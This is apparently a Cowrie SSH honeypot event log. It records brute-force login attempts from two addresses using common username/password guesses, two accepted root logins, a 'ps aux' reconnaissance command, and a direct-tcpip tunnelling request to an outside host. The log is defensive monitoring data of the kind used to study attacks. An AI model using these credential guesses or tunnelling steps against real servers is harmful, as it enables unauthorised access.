{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:33:16.784108Z","src_ip":"212.227.235.229","session":"a487a7e17bf1"}
{"eventid":"cowrie.login.failed","username":"runner","password":"12345","message":"login attempt [runner/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:33:17.660675Z","src_ip":"212.227.235.229","session":"a487a7e17bf1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:33:18.871417Z","src_ip":"212.227.235.229","session":"a487a7e17bf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39556,"dst_ip":"1.2.3.4","dst_port":22,"session":"d720a24cdca0","protocol":"ssh","message":"New connection: 212.227.125.160:39556 (1.2.3.4:22) [session: d720a24cdca0]","sensor":"my-vps","timestamp":"2025-08-28T13:33:18.900892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:33:18.901783Z","src_ip":"212.227.125.160","session":"d720a24cdca0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:33:19.076860Z","src_ip":"212.227.125.160","session":"d720a24cdca0"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:33:19.600457Z","src_ip":"212.227.125.160","session":"d720a24cdca0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:33:20.095283Z","src_ip":"212.227.125.160","session":"c7499902f06d"}
{"eventid":"cowrie.session.closed","duration":180.4963834285736,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:33:20.099313Z","src_ip":"212.227.125.160","session":"c7499902f06d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:33:20.776039Z","src_ip":"212.227.125.160","session":"d720a24cdca0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32314,"dst_ip":"1.2.3.4","dst_port":22,"session":"25578903cb3a","protocol":"ssh","message":"New connection: 212.227.235.229:32314 (1.2.3.4:22) [session: 25578903cb3a]","sensor":"my-vps","timestamp":"2025-08-28T13:33:32.132971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:33:32.431643Z","src_ip":"212.227.235.229","session":"25578903cb3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:33:32.432585Z","src_ip":"212.227.235.229","session":"25578903cb3a"}
{"eventid":"cowrie.login.success","username":"root","password":"10011971","message":"login attempt [root/10011971] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:33:33.948550Z","src_ip":"212.227.235.229","session":"25578903cb3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:33:34.510494Z","src_ip":"212.227.235.229","session":"25578903cb3a"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T13:33:34.511297Z","src_ip":"212.227.235.229","session":"25578903cb3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:33:34.784826Z","src_ip":"212.227.235.229","session":"25578903cb3a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:33:34.790803Z","src_ip":"212.227.235.229","session":"25578903cb3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50908,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b999daf968a","protocol":"ssh","message":"New connection: 212.227.125.160:50908 (1.2.3.4:22) [session: 8b999daf968a]","sensor":"my-vps","timestamp":"2025-08-28T13:33:54.336443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:33:54.337374Z","src_ip":"212.227.125.160","session":"8b999daf968a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:33:54.504133Z","src_ip":"212.227.125.160","session":"8b999daf968a"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"password","message":"login attempt [nginx/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:33:55.163471Z","src_ip":"212.227.125.160","session":"8b999daf968a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:33:56.332843Z","src_ip":"212.227.125.160","session":"8b999daf968a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45434,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fba7fbd412f","protocol":"ssh","message":"New connection: 212.227.125.160:45434 (1.2.3.4:22) [session: 2fba7fbd412f]","sensor":"my-vps","timestamp":"2025-08-28T13:34:28.997645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:34:29.001463Z","src_ip":"212.227.125.160","session":"2fba7fbd412f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:34:29.181347Z","src_ip":"212.227.125.160","session":"2fba7fbd412f"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456789","message":"login attempt [nginx/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:34:29.915783Z","src_ip":"212.227.125.160","session":"2fba7fbd412f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:34:31.101766Z","src_ip":"212.227.125.160","session":"2fba7fbd412f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35320,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa4ed5085fbe","protocol":"ssh","message":"New connection: 212.227.235.229:35320 (1.2.3.4:22) [session: aa4ed5085fbe]","sensor":"my-vps","timestamp":"2025-08-28T13:34:41.996515Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:34:41.997737Z","src_ip":"212.227.235.229","session":"aa4ed5085fbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35624,"dst_ip":"1.2.3.4","dst_port":22,"session":"899144a0efa0","protocol":"ssh","message":"New connection: 212.227.235.229:35624 (1.2.3.4:22) [session: 899144a0efa0]","sensor":"my-vps","timestamp":"2025-08-28T13:34:42.186543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:34:42.187492Z","src_ip":"212.227.235.229","session":"899144a0efa0"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T13:34:42.349134Z","src_ip":"212.227.235.229","session":"899144a0efa0"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:34:42.831465Z","src_ip":"212.227.235.229","session":"899144a0efa0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T13:34:42.992518Z","session":"899144a0efa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60990,"dst_ip":"1.2.3.4","dst_port":22,"session":"127f44bf379f","protocol":"ssh","message":"New connection: 212.227.125.160:60990 (1.2.3.4:22) [session: 127f44bf379f]","sensor":"my-vps","timestamp":"2025-08-28T13:35:03.732904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:35:03.733694Z","src_ip":"212.227.125.160","session":"127f44bf379f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:35:03.899024Z","src_ip":"212.227.125.160","session":"127f44bf379f"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"12345","message":"login attempt [nginx/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:35:04.565272Z","src_ip":"212.227.125.160","session":"127f44bf379f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:35:05.792507Z","src_ip":"212.227.125.160","session":"127f44bf379f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42002,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c038b51e8f2","protocol":"ssh","message":"New connection: 212.227.125.160:42002 (1.2.3.4:22) [session: 0c038b51e8f2]","sensor":"my-vps","timestamp":"2025-08-28T13:35:39.285651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:35:39.286755Z","src_ip":"212.227.125.160","session":"0c038b51e8f2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:35:39.457325Z","src_ip":"212.227.125.160","session":"0c038b51e8f2"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"12345678","message":"login attempt [nginx/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:35:39.971170Z","src_ip":"212.227.125.160","session":"0c038b51e8f2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:35:41.144497Z","src_ip":"212.227.125.160","session":"0c038b51e8f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62193,"dst_ip":"1.2.3.4","dst_port":22,"session":"b29b2bf8f3e0","protocol":"ssh","message":"New connection: 212.227.125.160:62193 (1.2.3.4:22) [session: b29b2bf8f3e0]","sensor":"my-vps","timestamp":"2025-08-28T13:35:52.054581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:35:52.055519Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:35:52.136691Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:35:52.187592Z","src_ip":"212.227.235.229","session":"899144a0efa0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1","message":"login attempt [backup/1] failed","sensor":"my-vps","timestamp":"2025-08-28T13:35:52.543776Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc123","message":"login attempt [backup/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:35:53.627410Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abcd123","message":"login attempt [backup/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:35:54.721790Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abcd1234","message":"login attempt [backup/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:35:55.806171Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc1234","message":"login attempt [backup/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:35:56.889239Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:35:57.972539Z","src_ip":"212.227.125.160","session":"b29b2bf8f3e0"}
